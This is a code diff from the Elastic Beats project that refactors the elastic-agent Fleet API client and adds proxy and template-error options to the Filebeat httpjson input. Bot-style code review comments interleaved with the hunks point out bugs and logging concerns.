@@ -29,7 +29,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "abc123")) return mux }, func(t *testing.T, host string) { @@ -58,7 +58,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", authHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "secret")) return mux }, func(t *testing.T, host string) { @@ -82,7 +82,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) require.Equal(t, r.Header.Get("User-Agent"), "Elastic Agent v8.0.0") }) return mux @@ -116,6 +116,7 @@ func TestHTTPClient(t *testing.T) { client, err := kibana.NewWithRawConfig(nil, cfg, func(wrapped http.RoundTripper) (http.RoundTripper, error) { return NewFleetAuthRoundTripper(wrapped, "abc123") }) + require.NoError(t, err) _, err = client.Send(timeoutCtx, "GET", "/echo-hello", nil, nil, nil) require.Error(t, err) 
@@ -129,18 +130,18 @@ func TestExtract(t *testing.T) { // The error before is returned when an exception or an internal occur in Kibana, they // are not only generated by the Fleet app. t.Run("standard high level kibana errors", func(t *testing.T) { - err := extract(strings.NewReader(`{ "statusCode": 500, "Internal Server Error"}`)) + err := ExtractError(strings.NewReader(`{ "statusCode": 500, "Internal Server Error"}`)) assert.True(t, strings.Index(err.Error(), "500") > 0) assert.True(t, strings.Index(err.Error(), "Internal Server Error") > 0) }) t.Run("proxy or non json response", func(t *testing.T) { - err := extract(strings.NewReader("Bad Request")) + err := ExtractError(strings.NewReader("Bad Request")) assert.True(t, strings.Index(err.Error(), "Bad Request") > 0) }) t.Run("Fleet generated errors", func(t *testing.T) { - err := extract(strings.NewReader(`{"statusCode":400,"error":"Bad Request","message":"child \"metadata\" fails because [\"cal\" is not allowed]","validation":{"source":"payload","keys":["metadata.cal"]}}`)) + err := ExtractError(strings.NewReader(`{"statusCode":400,"error":"Bad Request","message":"child \"metadata\" fails because [\"cal\" is not allowed]","validation":{"source":"payload","keys":["metadata.cal"]}}`)) assert.True(t, strings.Index(err.Error(), "400") > 0) assert.True(t, strings.Index(err.Error(), "Bad Request") > 0) assert.True(t, strings.Index(err.Error(), "fails because") > 0) diff --git a/x-pack/elastic-agent/pkg/fleetapi/client/helper_test.go b/x-pack/elastic-agent/pkg/fleetapi/client/helper_test.go new file mode 100644 index 00000000000..fce400ef067 --- /dev/null +++ b/x-pack/elastic-agent/pkg/fleetapi/client/helper_test.go 
@@ -0,0 +1,34 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package client + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" +) + +func authHandler(handler http.HandlerFunc, apiKey string) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + const key = "Authorization" + const prefix = "ApiKey " + + v := strings.TrimPrefix(r.Header.Get(key), prefix) + if v != apiKey { + http.Error(w, "Unauthorized", http.StatusUnauthorized) + return + } + handler(w, r) + } +} + +func withServer(m func(t *testing.T) *http.ServeMux, test func(t *testing.T, host string)) func(t *testing.T) { + return func(t *testing.T) { + s := httptest.NewServer(m(t)) + defer s.Close() + test(t, s.Listener.Addr().String()) + } +} diff --git a/x-pack/elastic-agent/pkg/fleetapi/round_trippers.go b/x-pack/elastic-agent/pkg/fleetapi/client/round_trippers.go similarity index 97% rename from x-pack/elastic-agent/pkg/fleetapi/round_trippers.go rename to x-pack/elastic-agent/pkg/fleetapi/client/round_trippers.go index d40da3bccdc..a0c4c04e068 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/round_trippers.go +++ b/x-pack/elastic-agent/pkg/fleetapi/client/round_trippers.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package fleetapi +package client import ( "errors" @@ -16,8 +16,7 @@ var ErrInvalidAPIKey = errors.New("invalid api key to authenticate with fleet") // FleetUserAgentRoundTripper adds the Fleet user agent. type FleetUserAgentRoundTripper struct { - rt http.RoundTripper - version string + rt http.RoundTripper } // RoundTrip adds the Fleet user agent string to every request. 
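Review bot: `authHandler` in the new client/helper_test.go accepts a request whose `Authorization` header is the bare key, because `strings.TrimPrefix` returns the value unchanged when the `ApiKey ` prefix is missing. A test built on this helper would still pass if the client stopped sending the scheme prefix. Checking the prefix explicitly closes that gap: `h := r.Header.Get(key)` followed by `if !strings.HasPrefix(h, prefix) || h[len(prefix):] != apiKey {`. `withServer` also duplicates the helper of the same name in the parent fleetapi package's helper_test.go, so a short comment explaining why the copy exists would help.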
diff --git a/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go b/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go index fc3949799a2..3b8db6e4a63 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go +++ b/x-pack/elastic-agent/pkg/fleetapi/enroll_cmd.go @@ -18,6 +18,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) // EnrollType is the type of enrollment to do with the elastic-agent. @@ -168,7 +169,7 @@ func (e *EnrollResponse) Validate() error { // EnrollCmd is the command to be executed to enroll an elastic-agent into Fleet. type EnrollCmd struct { - client clienter + client client.Sender } // Execute enroll the Agent in the Fleet. @@ -210,7 +211,7 @@ func (e *EnrollCmd) Execute(ctx context.Context, r *EnrollRequest) (*EnrollRespo } if resp.StatusCode != http.StatusOK { - return nil, extract(resp.Body) + return nil, client.ExtractError(resp.Body) } enrollResponse := &EnrollResponse{} @@ -227,6 +228,6 @@ func (e *EnrollCmd) Execute(ctx context.Context, r *EnrollRequest) (*EnrollRespo } // NewEnrollCmd creates a new EnrollCmd. -func NewEnrollCmd(client clienter) *EnrollCmd { +func NewEnrollCmd(client client.Sender) *EnrollCmd { return &EnrollCmd{client: client} } diff --git a/x-pack/elastic-agent/pkg/fleetapi/helper_test.go b/x-pack/elastic-agent/pkg/fleetapi/helper_test.go index 85f66e747ca..4650eb5c4ff 100644 --- a/x-pack/elastic-agent/pkg/fleetapi/helper_test.go +++ b/x-pack/elastic-agent/pkg/fleetapi/helper_test.go @@ -13,6 +13,7 @@ import ( "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" ) 
@@ -41,16 +42,16 @@ func withServer(m func(t *testing.T) *http.ServeMux, test func(t *testing.T, hos func withServerWithAuthClient( m func(t *testing.T) *http.ServeMux, apiKey string, - test func(t *testing.T, client clienter), + test func(t *testing.T, client client.Sender), ) func(t *testing.T) { return withServer(m, func(t *testing.T, host string) { - log, _ := logger.New("") + log, _ := logger.New("", false) cfg := &kibana.Config{ Host: host, } - client, err := NewAuthWithConfig(log, apiKey, cfg) + client, err := client.NewAuthWithConfig(log, apiKey, cfg) require.NoError(t, err) test(t, client) }) diff --git a/x-pack/elastic-agent/pkg/kibana/client.go b/x-pack/elastic-agent/pkg/kibana/client.go index 083aa8d0d83..24be2e7f05e 100644 --- a/x-pack/elastic-agent/pkg/kibana/client.go +++ b/x-pack/elastic-agent/pkg/kibana/client.go @@ -79,7 +79,7 @@ func NewConfigFromURL(kURL string) (*Config, error) { func NewWithRawConfig(log *logger.Logger, config *config.Config, wrapper wrapperFunc) (*Client, error) { l := log if l == nil { - log, err := logger.New("kibana_client") + log, err := logger.New("kibana_client", false) if err != nil { return nil, err } diff --git a/x-pack/elastic-agent/pkg/kibana/client_test.go b/x-pack/elastic-agent/pkg/kibana/client_test.go index 36d24b88a00..7dff58ffb6f 100644 --- a/x-pack/elastic-agent/pkg/kibana/client_test.go +++ b/x-pack/elastic-agent/pkg/kibana/client_test.go @@ -35,7 +35,7 @@ func addCatchAll(mux *http.ServeMux, t *testing.T) *http.ServeMux { } func TestPortDefaults(t *testing.T) { - l, err := logger.New("") + l, err := logger.New("", false) require.NoError(t, err) testCases := []struct { @@ -70,7 +70,7 @@ func TestPortDefaults(t *testing.T) { // - Prefix. func TestHTTPClient(t *testing.T) { ctx := context.Background() - l, err := logger.New("") + l, err := logger.New("", false) require.NoError(t, err) t.Run("Guard against double slashes on path", withServer( 
@@ -79,7 +79,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/nested/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return addCatchAll(mux, t) }, func(t *testing.T, host string) { @@ -88,9 +88,11 @@ func TestHTTPClient(t *testing.T) { url := "http://" + host + "/" c, err := NewConfigFromURL(url) - client, err := NewWithConfig(l, c, noopWrapper) + require.NoError(t, err) + client, err := NewWithConfig(l, c, noopWrapper) require.NoError(t, err) + resp, err := client.Send(ctx, "GET", "/nested/echo-hello", nil, nil, nil) require.NoError(t, err) @@ -107,7 +109,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return mux }, func(t *testing.T, host string) { @@ -133,7 +135,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/mycustompath/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return mux }, func(t *testing.T, host string) { @@ -160,7 +162,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", basicAuthHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "hello", "world", "testing")) return mux }, func(t *testing.T, host string) { @@ -188,7 +190,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", basicAuthHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "hello", "world", "testing")) return mux }, func(t *testing.T, host string) { 
@@ -212,7 +214,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) require.Equal(t, r.Header.Get("User-Agent"), "custom-agent") }) return mux @@ -242,7 +244,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", enforceKibanaHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "8.0.0")) return mux }, func(t *testing.T, host string) { @@ -271,7 +273,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return mux }, func(t *testing.T, host string) { diff --git a/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go b/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go index b4bd233d205..779108c8a7b 100644 --- a/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go +++ b/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go @@ -15,13 +15,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet/config" ) -const ( - defaultThreshold = 1000 - agentIDKey = "elastic.agent.id" -) - -type ackFn func() - type event struct { AgentID string `json:"agent_id"` EventType string `json:"type"` diff --git a/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go b/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go index 8d25852efe7..ce307e1fbab 100644 --- a/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go +++ b/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go 
@@ -209,7 +209,7 @@ func getEvents(count int) []reporter.Event { } func newTestReporter(frequency time.Duration, threshold int) *Reporter { - log, _ := logger.New("") + log, _ := logger.New("", false) r := &Reporter{ info: &testInfo{}, queue: make([]fleetapi.SerializableEvent, 0), diff --git a/x-pack/elastic-agent/pkg/reporter/log/reporter.go b/x-pack/elastic-agent/pkg/reporter/log/reporter.go index e21864679e4..8651d7b800b 100644 --- a/x-pack/elastic-agent/pkg/reporter/log/reporter.go +++ b/x-pack/elastic-agent/pkg/reporter/log/reporter.go @@ -53,23 +53,5 @@ func defaultFormatFunc(e reporter.Event) string { ) } -type reportableEvent struct { - Type string - SubType string - Time string - Message string - Payload map[string]interface{} `json:"payload,omitempty"` -} - -func makeEventReportable(event reporter.Event) reportableEvent { - return reportableEvent{ - Type: event.Type(), - SubType: event.SubType(), - Time: event.Time().Format(timeFormat), - Message: event.Message(), - Payload: event.Payload(), - } -} - // Check it is reporter.Backend var _ reporter.Backend = &Reporter{} diff --git a/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go b/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go index 45f3452c0d6..f5d7d2d26e2 100644 --- a/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go +++ b/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go @@ -14,7 +14,6 @@ import ( // Bucket is a Token Bucket for rate limiting type Bucket struct { - size int dropAmount int rateChan chan struct{} closeChan chan struct{} diff --git a/x-pack/elastic-agent/spec/filebeat.yml b/x-pack/elastic-agent/spec/filebeat.yml index 6aacf99ccf0..c156d60aaa7 100644 --- a/x-pack/elastic-agent/spec/filebeat.yml +++ b/x-pack/elastic-agent/spec/filebeat.yml @@ -80,6 +80,7 @@ rules: - udp - unix - winlog + - filestream - filter_values: selector: inputs 
diff --git a/x-pack/elastic-agent/spec/osquerybeat.yml b/x-pack/elastic-agent/spec/osquerybeat.yml new file mode 100644 index 00000000000..8a7dd8b3538 --- /dev/null +++ b/x-pack/elastic-agent/spec/osquerybeat.yml @@ -0,0 +1,28 @@ +name: Osquerybeat +cmd: osquerybeat +args: ["-E", "setup.ilm.enabled=false", "-E", "setup.template.enabled=false", "-E", "management.mode=x-pack-fleet", "-E", "management.enabled=true", "-E", "logging.level=debug"] +action_input_types: +- osquery + +rules: +- fix_stream: {} +- inject_index: + type: logs + +- inject_stream_processor: + on_conflict: insert_after + type: logs + +- filter_values: + selector: inputs + key: type + values: + - osquery + +- filter: + selectors: + - inputs + - output + +when: length(${inputs}) > 0 and hasKey(${output}, 'elasticsearch') +constraints: ${runtime.arch} != 'arm64' \ No newline at end of file diff --git a/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc b/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc index 5d10e07a04e..e757ad6faea 100644 --- a/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc +++ b/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc @@ -11,8 +11,6 @@ AWS S3 ++++ -beta[] - Use the `aws-s3` input to retrieve logs from S3 objects that are pointed by messages from specific SQS queues. This input can, for example, be used to receive S3 server access logs to monitor detailed records for the requests that are made to diff --git a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc index be5763830ad..c698c99e4cc 100644 --- a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc +++ b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc @@ -20,6 +20,7 @@ This input supports: * Pagination * Retries * Rate limiting +* Proxying * Request transformations * Response transformations 
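Review bot: The `args` line of the new osquerybeat spec hard-codes `"-E", "logging.level=debug"`, so every osquerybeat the agent starts logs at debug level regardless of the operator's logging configuration. Debug output is verbose and may put query results or configuration values into log files, depending on what the beat logs at that level; that needs checking against the beat itself. Unless this is only for initial bring-up, drop the last two entries so the list ends with `"-E", "management.enabled=true"]`. Otherwise add a comment stating when the override will be removed. The file also ends without a trailing newline.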
@@ -53,10 +54,10 @@ filebeat.inputs: target: url.value value: http://localhost:9200/_search/scroll - set: - target: .url.params.scroll_id - value: '[[.last_request.body._scroll_id]]' + target: url.params.scroll_id + value: '[[.last_response.body._scroll_id]]' - set: - target: .body.scroll + target: body.scroll value: 5m ---- @@ -96,7 +97,7 @@ The `httpjson` input keeps a runtime state between requests. This state can be a The state has the following elements: - `last_response.url.value`: The full URL with params and fragments from the last request with a successful response. -- `last_request.url.params`: A map containing the params from the URL in `last_response.url.value`. +- `last_response.url.params`: A map containing the params from the URL in `last_response.url.value`. - `last_response.header`: A map containing the headers from the last successful response. - `last_response.body`: A map containing the parsed JSON body from the last successful response. This is the response as it comes from the remote server. - `last_response.page`: A number indicating the page number of the last response. @@ -133,6 +134,7 @@ Appends a value to a list. If the field does not exist, the first entry will be - `target` defines the destination field where the value is stored. - `value` defines the value that will be stored and it is a <>. - `default` defines the fallback value whenever `value` is empty or the template parsing fails. Default templates do not have access to any state, only to functions. +- `fail_on_template_error` if set to `true` an error will be returned and the request will be aborted when the template evaluation fails. Default is `false`. [float] ==== `delete` 
@@ -163,6 +165,7 @@ Sets a value. - `target` defines the destination field where the value is stored. - `value` defines the value that will be stored and it is a <>. - `default` defines the fallback value whenever `value` is empty or the template parsing fails. Default templates do not have access to any state, only to functions. +- `fail_on_template_error` if set to `true` an error will be returned and the request will be aborted when the template evaluation fails. Default is `false`. [[value-templates]] ==== Value templates @@ -383,6 +386,22 @@ This specifies SSL/TLS configuration. If the ssl section is missing, the host's CAs are used for HTTPS connections. See <> for more information. +[float] +==== `request.proxy_url` + +This specifies proxy configuration in the form of `http[s]://:@:` + +["source","yaml",subs="attributes"] +---- +filebeat.inputs: +# Fetch your public IP every minute. +- type: httpjson + config_version: 2 + interval: 1m + request.url: https://api.ipify.org/?format=json + request.proxy_url: http://proxy.example:8080 +---- + [float] ==== `request.retry.max_attempts` @@ -482,16 +501,16 @@ filebeat.inputs: - delete: target: body.very_confidential response.split: - target: .body.hits.hits + target: body.hits.hits response.pagination: - set: target: url.value value: http://localhost:9200/_search/scroll - set: - target: .url.params.scroll_id - value: '[[.last_request.body._scroll_id]]' + target: url.params.scroll_id + value: '[[.last_response.body._scroll_id]]' - set: - target: .body.scroll + target: body.scroll value: 5m ---- diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index 1d6778167d6..0773814bb2d 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml 
@@ -1369,7 +1369,11 @@ filebeat.modules: #var.oauth2.client.secret: "" # Oauth Token URL, should include the tenant ID - #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/token" + #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/v2.0/token" + + # Related scopes, default should be included + #var.oauth2.scopes: + # - "https://api.security.microsoft.com/.default" dhcp: enabled: true @@ -2157,6 +2161,8 @@ filebeat.modules: enabled: true notice: enabled: true + ntp: + enabled: true ntlm: enabled: true ocsp: diff --git a/x-pack/filebeat/input/httpjson/internal/v2/config_request.go b/x-pack/filebeat/input/httpjson/internal/v2/config_request.go index d2c93363c87..f64a03d9899 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/config_request.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/config_request.go @@ -88,6 +88,7 @@ type requestConfig struct { RedirectMaxRedirects int `config:"redirect.max_redirects"` RateLimit *rateLimitConfig `config:"rate_limit"` Transforms transformsConfig `config:"transforms"` + ProxyURL *urlConfig `config:"proxy_url"` } func (c requestConfig) getTimeout() time.Duration { diff --git a/x-pack/filebeat/input/httpjson/internal/v2/cursor.go b/x-pack/filebeat/input/httpjson/internal/v2/cursor.go index 053cdd87bd4..a324ac15dd5 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/cursor.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/cursor.go @@ -50,7 +50,7 @@ func (c *cursor) update(trCtx *transformContext) { } for k, cfg := range c.cfg { - v := cfg.Value.Execute(trCtx, transformable{}, cfg.Default, c.log) + v, _ := cfg.Value.Execute(trCtx, transformable{}, cfg.Default, c.log) _, _ = c.state.Put(k, v) c.log.Debugf("cursor.%s stored with %s", k, v) } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/input.go b/x-pack/filebeat/input/httpjson/internal/v2/input.go index f9c76226818..e8c8fe51082 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/input.go 
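Review bot: In `cursor.update` (cursor.go) the error now returned by `cfg.Value.Execute` is discarded with `v, _ :=`, and `v` is then written unconditionally by `c.state.Put(k, v)`. Going by the value_tpl.go change in this commit, a failed or empty template with no default yields an empty string, so a failure overwrites the stored cursor entry with `""` and the next run has no position to resume from. Keeping the previous value on error avoids that: `v, err := cfg.Value.Execute(trCtx, transformable{}, cfg.Default, c.log)` followed by `if err != nil { continue }`. If overwriting is intended, a comment should say so. request.go in this commit moves `trCtx.updateCursor()` into the per-event loop, which presumably makes this path run more often. The body of `update` starts outside the hunk.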
+++ b/x-pack/filebeat/input/httpjson/internal/v2/input.go @@ -149,17 +149,22 @@ func run( func newHTTPClient(ctx context.Context, config config, tlsConfig *tlscommon.TLSConfig, log *logp.Logger) (*httpClient, error) { timeout := config.Request.getTimeout() + proxy_url := config.Request.ProxyURL // Make retryable HTTP client + transport := &http.Transport{ + DialContext: (&net.Dialer{ + Timeout: timeout, + }).DialContext, + TLSClientConfig: tlsConfig.ToConfig(), + DisableKeepAlives: true, + } + if proxy_url != nil && proxy_url.URL != nil { + transport.Proxy = http.ProxyURL(proxy_url.URL) + } client := &retryablehttp.Client{ HTTPClient: &http.Client{ - Transport: &http.Transport{ - DialContext: (&net.Dialer{ - Timeout: timeout, - }).DialContext, - TLSClientConfig: tlsConfig.ToConfig(), - DisableKeepAlives: true, - }, + Transport: transport, Timeout: timeout, CheckRedirect: checkRedirect(config.Request, log), }, diff --git a/x-pack/filebeat/input/httpjson/internal/v2/pagination.go b/x-pack/filebeat/input/httpjson/internal/v2/pagination.go index 4796742d9bc..6b28fa0f206 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/pagination.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/pagination.go @@ -124,8 +124,10 @@ func (iter *pageIterator) next() (*response, bool, error) { httpReq, err := iter.pagination.requestFactory.newHTTPRequest(iter.stdCtx, iter.trCtx) if err != nil { - if err == errNewURLValueNotSet { - // if this error happens here it means the transform used to pick the new url.value + if err == errNewURLValueNotSet || + err == errEmptyTemplateResult || + err == errExecutingTemplate { + // if this error happens here it means a transform // did not find any new value and we can stop paginating without error iter.done = true return nil, false, nil diff --git a/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go b/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go index 5c7e2c16a98..5d457dea7ae 100644 
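Review bot: The new local `proxy_url` in `newHTTPClient` uses snake_case, which Go naming conventions and the usual linters reject; `proxyURL := config.Request.ProxyURL` matches the field it copies. Separately, the documentation added in this commit describes `request.proxy_url` in a form that appears to allow a username and password in the URL, so the value should never reach logs or error messages unredacted; `url.URL` has a `Redacted()` method for that. Nothing in this hunk logs the value, so this is a request for a comment next to the `transport.Proxy` assignment, not a reported leak.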
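Review bot: In `pageIterator.next` (pagination.go) the added conditions treat `errExecutingTemplate` as "no next page": the iterator sets `iter.done = true` and returns `nil, false, nil`. A template that fails outright therefore ends pagination silently and leaves the remaining pages uncollected. If `set.run` returns that error unchanged under `fail_on_template_error: true`, the failure the user asked to see is swallowed on this path. Consider stopping quietly only for `errNewURLValueNotSet` and `errEmptyTemplateResult`, and returning `errExecutingTemplate` to the caller or logging it above debug level. The comparisons use `==`; `errors.Is(err, errEmptyTemplateResult)` would keep working if the error is ever wrapped.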
--- a/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go @@ -104,7 +104,7 @@ func (r *rateLimiter) getRateLimit(resp *http.Response) (int64, error) { tr := transformable{} tr.setHeader(resp.Header) - remaining := r.remaining.Execute(emptyTransformContext(), tr, nil, r.log) + remaining, _ := r.remaining.Execute(emptyTransformContext(), tr, nil, r.log) if remaining == "" { return 0, errors.New("remaining value is empty") } @@ -122,7 +122,7 @@ func (r *rateLimiter) getRateLimit(resp *http.Response) (int64, error) { return 0, nil } - reset := r.reset.Execute(emptyTransformContext(), tr, nil, r.log) + reset, _ := r.reset.Execute(emptyTransformContext(), tr, nil, r.log) if reset == "" { return 0, errors.New("reset value is empty") } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/request.go b/x-pack/filebeat/input/httpjson/internal/v2/request.go index 2ef92175494..c02cab5be8b 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/request.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/request.go @@ -201,11 +201,10 @@ func (r *requester) doRequest(stdCtx context.Context, trCtx *transformContext, p trCtx.updateFirstEvent(maybeMsg.msg) } trCtx.updateLastEvent(maybeMsg.msg) + trCtx.updateCursor() n++ } - trCtx.updateCursor() - r.log.Infof("request finished: %d events published", n) return nil diff --git a/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go b/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go index 6a5867e5bbb..f2561ecd55b 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go 
@@ -16,16 +16,18 @@ import ( const appendName = "append" type appendConfig struct { - Target string `config:"target"` - Value *valueTpl `config:"value"` - Default *valueTpl `config:"default"` + Target string `config:"target"` + Value *valueTpl `config:"value"` + Default *valueTpl `config:"default"` + FailOnTemplateError bool `config:"fail_on_template_error"` } type appendt struct { - log *logp.Logger - targetInfo targetInfo - value *valueTpl - defaultValue *valueTpl + log *logp.Logger + targetInfo targetInfo + value *valueTpl + defaultValue *valueTpl + failOnTemplateError bool runFunc func(ctx *transformContext, transformable transformable, key, val string) error } @@ -100,15 +102,19 @@ func newAppend(cfg *common.Config, log *logp.Logger) (appendt, error) { } return appendt{ - log: log, - targetInfo: ti, - value: c.Value, - defaultValue: c.Default, + log: log, + targetInfo: ti, + value: c.Value, + defaultValue: c.Default, + failOnTemplateError: c.FailOnTemplateError, }, nil } func (append *appendt) run(ctx *transformContext, tr transformable) (transformable, error) { - value := append.value.Execute(ctx, tr, append.defaultValue, append.log) + value, err := append.value.Execute(ctx, tr, append.defaultValue, append.log) + if err != nil && append.failOnTemplateError { + return transformable{}, err + } if err := append.runFunc(ctx, tr, append.targetInfo.Name, value); err != nil { return transformable{}, err } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go b/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go index fcdb1fbbb39..4f975ba7db4 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go 
@@ -19,16 +19,18 @@ var errNewURLValueNotSet = errors.New("the new url.value was not set") const setName = "set" type setConfig struct { - Target string `config:"target"` - Value *valueTpl `config:"value"` - Default *valueTpl `config:"default"` + Target string `config:"target"` + Value *valueTpl `config:"value"` + Default *valueTpl `config:"default"` + FailOnTemplateError bool `config:"fail_on_template_error"` } type set struct { - log *logp.Logger - targetInfo targetInfo - value *valueTpl - defaultValue *valueTpl + log *logp.Logger + targetInfo targetInfo + value *valueTpl + defaultValue *valueTpl + failOnTemplateError bool runFunc func(ctx *transformContext, transformable transformable, key, val string) error } @@ -105,15 +107,19 @@ func newSet(cfg *common.Config, log *logp.Logger) (set, error) { } return set{ - log: log, - targetInfo: ti, - value: c.Value, - defaultValue: c.Default, + log: log, + targetInfo: ti, + value: c.Value, + defaultValue: c.Default, + failOnTemplateError: c.FailOnTemplateError, }, nil } func (set *set) run(ctx *transformContext, tr transformable) (transformable, error) { - value := set.value.Execute(ctx, tr, set.defaultValue, set.log) + value, err := set.value.Execute(ctx, tr, set.defaultValue, set.log) + if err != nil && set.failOnTemplateError { + return transformable{}, err + } if err := set.runFunc(ctx, tr, set.targetInfo.Name, value); err != nil { return transformable{}, err } @@ -155,11 +161,6 @@ func setURLParams(ctx *transformContext, transformable transformable, key, value } func setURLValue(ctx *transformContext, transformable transformable, _, value string) error { - // if the template processing did not find any value - // we fail without parsing - if value == "" || value == "" { - return errNewURLValueNotSet - } url, err := url.Parse(value) if err != nil { return errNewURLValueNotSet 
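Review bot: Removing the empty-value guard from `setURLValue` lets an empty `value` reach `url.Parse`, which accepts the empty string without error, so the early `errNewURLValueNotSet` return is lost. `set.run` in the hunk above stops on a template error only when `failOnTemplateError` is true, and the new field defaults to false, so by default a template that renders nothing now appears to replace the request URL with an empty one. The rest of `setURLValue` is outside the hunk, so what is done with the parsed URL is inferred. A minimal guard keeps the old failure mode: `if value == "" { return errNewURLValueNotSet }`.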
